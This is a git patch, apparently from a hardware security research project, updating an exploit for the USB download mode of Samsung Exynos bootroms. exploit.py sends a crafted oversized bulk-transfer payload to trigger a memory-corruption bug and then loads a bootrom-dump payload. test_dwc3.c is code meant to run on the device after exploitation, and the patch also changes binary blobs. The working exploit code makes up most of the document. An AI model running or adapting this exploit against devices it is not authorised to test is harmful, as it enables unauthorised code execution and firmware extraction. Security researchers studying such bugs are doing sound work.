From 8c1f008deb015f2b0f2a6307dfa80740af42f79c Mon Sep 17 00:00:00 2001
From: Eljakim Herrewijnen <eljakim.herrewijnen@gmail.com>
Date: Tue, 23 Jul 2024 23:50:40 +0200
Subject: [PATCH] working usb send

---
 dwc3.bin    | Bin 220 -> 344 bytes
 dwc3.elf    | Bin 7536 -> 7696 bytes
 dwc3.o      | Bin 1488 -> 1744 bytes
 exploit.py  |   7 ++++--
 test_dwc3.c |  64 ++++++++++++++++++++++++++++++++++++++++------------
 5 files changed, 54 insertions(+), 17 deletions(-)

diff --git a/dwc3.bin b/dwc3.bin
index e800078bf9461b6c1bde9b6998bd2b4010f36e95..2a61d9408696d55680a4e3e730477ee2cc924688 100755
GIT binary patch
delta 307
zcmcb^c!S9&kbyzui~qirA`I<8f2$c+{&i-U_?ekeE5u<z(To}O(?2sXn7m*X*5a&j
zn5-r0V8Ox4@Ue@D!E)jM{~;L+4M81343>YZ9anzwKeS?Ef{ZScLj&BLdZ4-^Q|qTY
z0M*q4&3eepunNQmsZj><k4>B?UVpr~e)`Y<|HVOud}eq0aez7g+TZHEE17``m17u;
z9h(}1{xSm{70kG@m2KuF6QDTjibbCmi97scVV`+PjX^|<1<0QaWD5gnXBI}y!wn5V
z4mAv#512)?76R3|88BEf{cO3kkbz+*V_{R!d?207#IVzW!Cv<oNKqn_!_Lpajw}CG
aA6@}+0K^gdSAr})`2YX(J3#yo=tux??}E_)

delta 201
zcmcb?bcZoPpMgQ-E5GcIFaC@xMHt$HLL3$p{jFwN`L~&2Vk0Ai$!BIpt*^}TS`G{i
zK~rYbPhY{rz|B$XFqwnV!E!4bgJ3<AXm$q^gC*nt{~;MbH620>mVc|AR(|n!T=|vV
z`Nu>bnFJ-E_}^;Am4BTXCe{Ph?w?ve{W#F93?>Ild0vLX1q=)!3P3fEj1562n(L?k
z{QqD4Z?)sf&+JY=4lu`G`&+$#<zHroi7)>DpU%M0aEXCI{@MeeoBmcGTmg~?03&};
AWB>pF

diff --git a/dwc3.elf b/dwc3.elf
index 61b2b6fef0ae673b2ec9ae5c071908ccc09d93f9..2bf5e44a7ffaa188dbc1c49f2730a770010618f5 100755
GIT binary patch
delta 470
zcmexhHNj?r2GazYiCSh{5t0mG5FxoSYnr%EAOnNQ7yo@LMHt$H{#G-t{Oimx@iQ}{
zR*1ubq8T&lr+;Q(FnPf&ti@U5Fj-5~!GeR8;bRvQgXO~i|3fku8iG267%cx*JFfiV
ze`v+z1PK{kCWi*NLG?g|N2b<KcK|A^2O9Q}nPC-(4N{{F<R6<nQ9``_cys;qpa1`h
zgN*si?)2jTbNscx)q7Vm163-=Fc>>FH3t1<20AO4ab+vp%u6Ofan==!J}nY=_{qXP
z^O72ah!zWwKN-jt2GY(fjGBiV8iE{Z7&IR+i)bwbs&g}7uw?q#a%mw0!%oJ+rl9#i
zI+=-Krvrn%?lq92L?(xwpMxD&{;fW|0^|UQBlfQZS$y#S|LJ#t_#e=blkZ4em^guD
z@*2rAj6RbqrR+HaB$${$AzCo`pp-hNizI|6GWnyFvZxRPBf|lxd<!Jp8G0rQO3&mh
zPR&b+Pf09EoV-%Hb+Uns0#gLz<RBR{rU=Q&T{3n|i87N<$=GoUNI`UMm@Fu3&Uru@
L!dp1`qKrHMY^kXJ

delta 328
zcmbPW^TBF@2Ga-WiCSh{cO)3V;Eu$`tZCv2`V0&rU-@N!eDP;oDZ<bm6ymU;=x;UC
z%D>GF6B`*BOg=L+YJFvv*K%NJ2%0jZe)<X~25yd8hshj_4whTl7zFE?M6)}X7%Un8
z{}0Iks_777u>4!?wDOC;<I1n>&OavmNXR580VV!cGp_vW%rLPYsCfU>`sv4khGj50
zSjzJ<6fR(32vGp4ab#==I?-G|{pbJx;(x0hSAJ%9`f-3c{@UN_{VV@6GfaH(|NnFb
zhK5TF4D#0=03G$W`rrzX{NxD93zK!E&M+oS{wZb8nIgf&1oC6VWJhUr&OK0`!sJ3}
z<;iQLr%m>eX_<UZMv3VT!{kpgW=wY^CTq#sG3}S0oF!|=IYAN}JPb1?Z<ICX)R2bo
KrcW-El?MRkoN_P#

diff --git a/dwc3.o b/dwc3.o
index aff8e129f78ab69e6fe85dd21a1695b0e1bdf10d..a372f27229d241b285a655e284286f497c7a5ba1 100644
GIT binary patch
delta 788
zcmZ8eO=uHA6n^uw#t;Q*5;sLbK~S@&))s6)$b^De5Zb1}i<J=Cf*_PO33x~#YpGa@
zhsG&LK+yD*^(LMIR%3h6W6Yr^5B26Xrk5Vp^-VIC)d%~&Z@%~KHv_L7YM<STXAL+h
z(PshzK;UTlqZ5H=X}3ficM_^SMy!l@lSj*T4`BQ!3tPdmkXBSooHn4lNg+}9yv#$e
z(;GvOa7!uYXnL<veRc6V74}I^1$`<*pikis25%Ktp6b^dm0gG7>B>BerPiLLU4}Q$
z5$EZtT4x+}qp|aA#}vmrQ0rWUh{f?Nk%ti{If?Jvc3PAne#jzL9euY)AVH7UJ9U62
zSzSxNMqHrK6p%bno*Wg;-dxIYOZ$x$%O12$Y;Nh3qb~mJc`v`?_uKPK86$0ZNcgag
zkLJ+z5dNuMNvO&80A$sO$`*~0TXK||!}riN1QY}r*dzL{M`}9d=;>Xpu4sI&b$x`t
z^Y>c+pa<(3XH*)oRIkLeb^&knEf+Fc52GH`T*18N(f{<K)>TeGa|LCe?$1|m#*#^9
zjPe2R_bts;&KaNH@aZA>fL)F(K3*8hF0G7Y3&mW%m@VdW%LQ3xo4l~Jy!e98P^igS
zZU*n@_%CvmCqo&`)rC8V$~KP$H`qXF$u7T1wq@M7M()d5!=zJGek13l&CiiKuF4Ez
LYQHArJLA$H4?d~@

delta 567
zcmZ9IJ4gdT5Qb;=9!U&pe8h{0Mr>j%1VxZw;c39aCPaeR84Dqxg{HAMBnb*eu<)3G
zod{awIxPe{wO2SSf~BRcm_VB2+?Z7lr`VbO=KptwwL9(LX}loAZ|L8Z4n9C=bPqS{
zDYW|GXeFax<Q;=q&H<PugqcqXCmK?8LWklCw^XVOg8qG-{HP~xRp=?O@K%{Y0$n$g
z<C=0WBphSWs;3sLhA-KCkk)IT-6KunZ=01+XpCzd11%>BW`X<6r|FS<%aOo*cil69
z;tN2u_QoeV#$&bRrV84FTYR<*AMW?op5vTKOp`7F$W+4^qZ_6TF7SRYFt`)CQIS_$
z-KmP`W(8dnc~5Y0g{&y%S}wX~5gaF!wL(ttJ_PXph<V--b@(4I3qHiT>d~Kgc!!5y
zd3eCXVKTqDy)j8Cxr_4hF)7M29#UG-0y(KItJ1DAAAJ4u@V^O@twaK^tPM};Lz%@0
h#nl)tQCij5Gg6ujP*Dlt3I9SZVDmLw;inrl`UN*}a4G-*

diff --git a/exploit.py b/exploit.py
index 0275fd9..a81e53d 100644
--- a/exploit.py
+++ b/exploit.py
@@ -82,7 +82,7 @@ class ExynosDevice():
         # self.write(b"\xaa" * CHUNK_SIZE, CHUNK_SIZE)
         
         transferred = ctypes.c_int()
-        bug_payload = p32(0) + p32(MAX_PAYLOAD_SIZE + 0x100) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)
+        bug_payload = p32(0) + p32(0x201 + 2 + MAX_PAYLOAD_SIZE + 0x7) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)
         bug_payload += b"\xcc" * (BLOCK_SIZE - len(bug_payload))
         res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, bug_payload, len(bug_payload), ctypes.byref(transferred), 0)
         assert res == 0
@@ -91,8 +91,10 @@ class ExynosDevice():
         res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
         assert res == 0
         
-        payload = b"\xaa" * (0x401 - (MAX_PAYLOAD_SIZE - 0x200))
+        payload = b"\xaa" * 0x200
         res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
+        while True:
+            res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 10)
         pass
 
     def test_bug(self):
@@ -278,6 +280,7 @@ if __name__ == "__main__":
     # wait_for_device()
     exynos = ExynosDevice()
     exynos.test_bug_2()
+    sys.exit(0)
     path = "dump/exynos-usbdl/payloads/Exynos8890_dump_bootrom.bin"
     # path = "/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin"
     exynos.exploit(open(path, "rb").read())
diff --git a/test_dwc3.c b/test_dwc3.c
index eb14a87..d39f0b2 100644
--- a/test_dwc3.c
+++ b/test_dwc3.c
@@ -10,25 +10,16 @@ extern void sleep(int endpoint,uint32_t timeout);
 #define recv_buffer 0x02021800 + 0x2000
 #define data_received 0x02021800 + 0x2004
 
-//   do {
-//                     /* loops until image has been received */
-//     usb_event_handler();
-//     iVar2 = download_ready?(); #TODO, set some global to indicate readyness
-//   } while (iVar2 == 0);
-
 void recv_data_cb(uint32_t endpoint, uint32_t len){
     void *rbuf;
     void *dest_buf = (void *)recv_buffer;
     volatile void *dref = (void *)data_received;
     
+    rbuf = get_endpoint_buffer(endpoint);
     for(int i= 0; i < len; i++){
-        rbuf = get_endpoint_buffer(2);
         *(char *)dest_buf = *(char *)(void *)((int)rbuf + i);
     }
-    // while(1){}
-    // asm("mov x0, #0x0");
-    // asm("br x0");
-    *(uint8_t *)dref = 3;
+    *(uint8_t *)dref = 1; // Mark as ready
 }
 
 void recv_data(){
@@ -38,18 +29,61 @@ void recv_data(){
     volatile void *dref = (void *)data_received;
     *(uint8_t *)dref = 0;
 
-    maybe_usb_setup_read(2, recv_data_cb, 1);
+    maybe_usb_setup_read(2, recv_data_cb, 0x200);
+    void *rbuf = get_endpoint_buffer(2);
+    dwc3_ep0_start_trans(2, (uint32_t)rbuf, 0x200);
     while(1){
         usb_event_handler();
-        if(*(uint8_t *)dref == 3){
+        if(*(uint8_t *)dref == 1){
             break;
         }
-        sleep(1, 10);
     }
 }
 
+void send_data(uint32_t *address, uint32_t size)
+{
+    // asm("stp	x29, x30, [sp,#-48]!");;
+    // asm("mov	w3, #0x0");
+    // asm("bfxil	w3, w1, #0, #24");
+    // asm("mov	w1, #0xc12");
+    // asm("mov	x29, sp");
+    // asm("stp	x19, x20, [sp,#16]");
+    // asm("mov	x5, #0xc834");
+    // asm("mov	w20, #0x1");
+    // asm("movk	x5, #0x1540, lsl #16");
+    // asm("ldr	x2, [x29,#40]");
+    // asm("mov	x4, #0xc838");
+    // asm("orr	w6, w1, w20");
+    // asm("movk	x4, #0x1540, lsl #16");
+    // asm("mov	x19, #0xc83c");
+    // asm("movk	x19, #0x1540, lsl #16");
+    // asm("stp	w3, w1, [x2,#8]");
+    // asm("mov	w3, #0x406");
+    // asm("stp	w0, wzr, [x2]");
+    // asm("mov	w0, w20");
+    // asm("ldr	x1, [x29,#40]");
+    // asm("strb	w6, [x2,#12]");
+    // asm("mov	x2, #0x27c8");
+    // asm("str	w1, [x5]");
+    // asm("mov	w1, #0x1388");
+    // asm("str	wzr, [x4]");
+    // asm("str	w3, [x19]");
+    // asm("blr	x2");
+    // asm("mov	w0, w20");
+    // asm("ldr	w1, [x19]");
+    // asm("ldp	x19, x20, [sp,#16]");
+    // asm("ldp	x29, x30, [sp],#48");
+    // asm("ret");
+}
+
 int main() {
-    recv_data();
+    while(1){
+        recv_data();
+        send_data((uint32_t *) recv_buffer, 0x200);
+    }
+    
+    
+
     // recv_data();
     // sleep(1, 5000);
     asm("mov x0, #0x0");